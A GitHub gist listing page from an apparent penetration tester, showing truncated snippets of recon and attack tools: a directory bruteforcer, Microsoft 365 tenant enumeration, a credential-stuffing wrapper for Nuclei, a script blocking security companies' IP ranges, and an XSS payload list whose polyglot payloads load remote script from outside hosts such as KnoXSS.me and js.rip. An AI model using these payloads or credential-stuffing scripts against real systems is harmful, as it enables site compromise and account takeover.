Skip to content

Instantly share code, notes, and snippets.

View nullenc0de's full-sized avatar

nullenc0de

221 followers · 0 following
View GitHub Profile
@nullenc0de
nullenc0de / rss_feed.py
Created August 30, 2022 19:20
|grep -B1 "$(date "+%b %Y")"
import feedparser
import webbrowser
feeds = ["https://blog.liftsecurity.io/feeds/all.atom.xml","https://winscripting.blog/feed/","https://shells.systems/feed/","http://r00tsec.blogspot.com/feeds/posts/default","https://nullsweep.com/rss/","http://rewtdance.blogspot.com/feeds/posts/default","https://www.youtube.com/playlist?list=UUOn5uwA42XWUnrjTilwG0xg","https://www.peew.pw/blog?format=RSS","http://syspanda.com/index.php/feed/","https://www.contextis.com/rss/blog","http://www.blackhillsinfosec.com/?feed=rss2","http://blog.ahmednabeel.com/rss/","https://cobbr.io/feed.xml","http://pen-testing.sans.org/blog/feed/","http://b4rtik.blogspot.com/feeds/posts/default","https://its-a-feature.github.io/feed.xml","https://chrislazari.com/feed/","https://pentesterslife.wordpress.com/feed/","https://labs.nettitude.com/feed/","https://stealthbits.com/blog/feed/","http://feeds.feedburner.com/CyberArms","https://wald0.com/?feed=rss2","http://www.thespanner.co.uk/feed/","http://www.wired.com/threatlevel/feed/","https://warroo
@nullenc0de
nullenc0de / aodirb.py
Created November 21, 2022 15:17
pip3 install asyncio and pip3 install import aiohttp
import asyncio
import aiohttp
import time
import sys
import argparse
import os
parser = argparse.ArgumentParser(description='Directory Bruteforce')
parser.add_argument('-u', '--url', help='URL to bruteforce', required=True)
parser.add_argument('-w', '--wordlist', help='Wordlist to use', required=True)
@nullenc0de
nullenc0de / 365doms.py
Created February 23, 2023 01:37
modified from https://github.com/expl0itabl3/check_mdi
#!/usr/bin/env python3
"""
Python script to enumerate valid Microsoft 365 domains, retrieve tenant name, and check for an MDI instance.
Based on: https://github.com/thalpius/Microsoft-Defender-for-Identity-Check-Instance.
Usage: ./check_mdi.py -d <domain>
"""
import argparse
import dns.resolver
@nullenc0de
nullenc0de / wordlistfinder.py
Created May 28, 2023 14:04
Find Best Wordlist
import os
def find_best_wordlists(user_word, max_wordlists):
wordlists_dir = '/opt/OneListForAll/dict'
wordlists = os.listdir(wordlists_dir)
matched_wordlists = []
for wordlist in wordlists:
if user_word.lower() in wordlist.lower():
@nullenc0de
nullenc0de / xss_payloads.txt
Last active August 4, 2024 23:02
XSS_Payloads
<Script/Src=//KnoXSS.me/00?1=1290></Script>
'/*\'/*"/*\"/*</Script><Input/AutoFocus/OnFocus=/**/(import(/https:KnoXSS.me\00?1=1290/.source))//>
JavaScript://%250A0?1:import(/https:KnoXSS.me\00?1=1290/.source)//*'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(d=document,d.body.appendChild(d.createElement(/script/.source)).src=/https:\\KnoXSS.me\00?1=1290/.source)}//\76-->
JavaScript://%250Aalert?.(1)//'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1)}//><Base/Href=//X55.is\76-->"><img src=x onerror='fetch("https://js.rip/t9eoip8zws)'><script>$.getScript("//js.rip/t9eoip8zws")</script><script src="//js.rip/t9eoip8zws"></script>
@nullenc0de
nullenc0de / cred_stuffer.py
Created September 24, 2023 13:18
h8mail -t "$1" -q domain -c ./h8mail_config.ini --skip -o /tmp/"$1".h8mail.csv && cat /tmp/"$1".h8mail.csv |grep "$1": |cut -d "-" -f2|tr -d ' ' |grep "$1" |sort -u
import subprocess
import argparse
# Define the command to run Nuclei
nuclei_command = "nuclei -silent -t credential-stuffing/cloud -var username={} -var password={}"
# Create a command-line argument parser
parser = argparse.ArgumentParser(description='Credential Stuffing Scanner')
# Add an argument for specifying the creds.txt file
@nullenc0de
nullenc0de / gist:14989ca1d0f48b6797a9d8df2505638e
Created November 25, 2023 15:52
company finder
curl -s https://ip-ranges.amazonaws.com/ip-ranges.json | jq -r '.prefixes[] | select(.region | startswith("us")) | .ip_prefix' | sort -u | tlsx -san -cn -silent -nc | awk -F'[][]' '{print $2}' | unfurl format %r.%t |tee aws_company.txt
sort ./aws_company.txt | uniq -c | sort -nr | awk '$1 >= 500'
@nullenc0de
nullenc0de / sort.sh
Created November 26, 2023 14:28
Sort the tlsx output
#!/bin/bash
declare -A companies
while read -r line; do
domain=$(echo "$line" | awk -F'[:[]' '{print $1}' | tr -d ' ')
company=$(echo "$line" | awk -F'[][]' '{print $2}' | tr -d ' ')
if [ -n "$domain" ] && [ -n "$company" ]; then
if [ -z "${companies[$company]}" ]; then
@nullenc0de
nullenc0de / block_sec.sh
Created February 16, 2024 16:49
Looks up IP addresses to companies and blocks them via IP tables.
#!/bin/bash
apt install golang -y
GOROOT="/usr/local/go"
PATH="${PATH}:${GOROOT}/bin"
GOPATH=$HOME/go
PATH="${PATH}:${GOROOT}/bin:${GOPATH}/bin"
go install github.com/projectdiscovery/asnmap/cmd/asnmap@latest
@nullenc0de
nullenc0de / proxy.sh
Created March 21, 2024 20:20
Proxy Binary to Burp
#!/bin/bash
# Set the proxy server and port
PROXY_SERVER="127.0.0.1"
PROXY_PORT="8080"
# Install Proxychains4
echo "Installing Proxychains4..."
sudo apt-get update
sudo apt-get install -y proxychains4